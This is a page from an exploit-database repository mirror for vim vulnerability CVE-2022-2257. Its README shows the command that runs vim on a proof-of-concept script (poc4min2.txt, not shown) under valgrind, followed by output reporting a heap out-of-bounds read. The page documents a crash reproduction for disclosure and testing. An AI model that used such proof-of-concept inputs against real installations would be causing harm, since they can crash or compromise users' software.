openkylin
/
openkylin-exploit-db
mirror of https://gitee.com/openkylin/openkylin-exploit-db.git
9
0
Fork 0
Code Issues Projects Releases Wiki Activity
openkylin-exploit-db/cve/vim/2022/CVE-2022-2257
History
LI, WENJIE 53740427d8 add cve/vim/2022/CVE-2022-2257/ 2022-11-23 10:52:43 +08:00
..
README.md add cve/vim/2022/CVE-2022-2257/ 2022-11-23 10:52:43 +08:00
poc4min2.txt add cve/vim/2022/CVE-2022-2257/ 2022-11-23 10:52:43 +08:00

README.md

漏洞复现

$ valgrind vim  -u NONE -i NONE -n -m -X -Z -e -s -S poc4min2.txt -c :qa!
==17304== Memcheck, a memory error detector
==17304== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==17304== Using Valgrind-3.18.1 and LibVEX; rerun with -h for copyright info
==17304== Command: vim -u NONE -i NONE -n -m -X -Z -e -s -S poc4min2.txt -c :qa!
==17304==
==17304== Invalid read of size 1
==17304==    at 0x331C4F: ??? (in /usr/bin/vim.basic)
==17304==    by 0x200FE0: ??? (in /usr/bin/vim.basic)
==17304==    by 0x200E84: ??? (in /usr/bin/vim.basic)
==17304==    by 0x200E84: ??? (in /usr/bin/vim.basic)
==17304==    by 0x201178: ??? (in /usr/bin/vim.basic)
==17304==    by 0x20218A: ??? (in /usr/bin/vim.basic)
==17304==    by 0x1AB4D7: ??? (in /usr/bin/vim.basic)
==17304==    by 0x27B4BD: ??? (in /usr/bin/vim.basic)
==17304==    by 0x27C260: ??? (in /usr/bin/vim.basic)
==17304==    by 0x1AB4D7: ??? (in /usr/bin/vim.basic)
==17304==    by 0x32AA1D: ??? (in /usr/bin/vim.basic)
==17304==    by 0x138D74: ??? (in /usr/bin/vim.basic)
==17304==  Address 0x57fcea4 is 0 bytes after a block of size 4 alloc'd
==17304==    at 0x483C839: malloc (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so)
==17304==    by 0x207339: ??? (in /usr/bin/vim.basic)
==17304==    by 0x207E53: ??? (in /usr/bin/vim.basic)
==17304==    by 0x201A38: ??? (in /usr/bin/vim.basic)
==17304==    by 0x20245D: ??? (in /usr/bin/vim.basic)
==17304==    by 0x1AB4D7: ??? (in /usr/bin/vim.basic)
==17304==    by 0x27B4BD: ??? (in /usr/bin/vim.basic)
==17304==    by 0x27C260: ??? (in /usr/bin/vim.basic)
==17304==    by 0x1AB4D7: ??? (in /usr/bin/vim.basic)
==17304==    by 0x32AA1D: ??? (in /usr/bin/vim.basic)
==17304==    by 0x138D74: ??? (in /usr/bin/vim.basic)
==17304==    by 0x4FDB0B2: (below main) (libc-start.c:308)
==17304==
==17304==
==17304== HEAP SUMMARY:
==17304==     in use at exit: 96,286 bytes in 582 blocks
==17304==   total heap usage: 1,495 allocs, 913 frees, 346,853 bytes allocated
==17304==
==17304== LEAK SUMMARY:
==17304==    definitely lost: 0 bytes in 0 blocks
==17304==    indirectly lost: 0 bytes in 0 blocks
==17304==      possibly lost: 1,352 bytes in 18 blocks
==17304==    still reachable: 94,934 bytes in 564 blocks
==17304==                       of which reachable via heuristic:
==17304==                         newarray           : 1,536 bytes in 16 blocks
==17304==         suppressed: 0 bytes in 0 blocks
==17304== Rerun with --leak-check=full to see details of leaked memory
==17304==
==17304== For lists of detected and suppressed errors, rerun with: -s
==17304== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)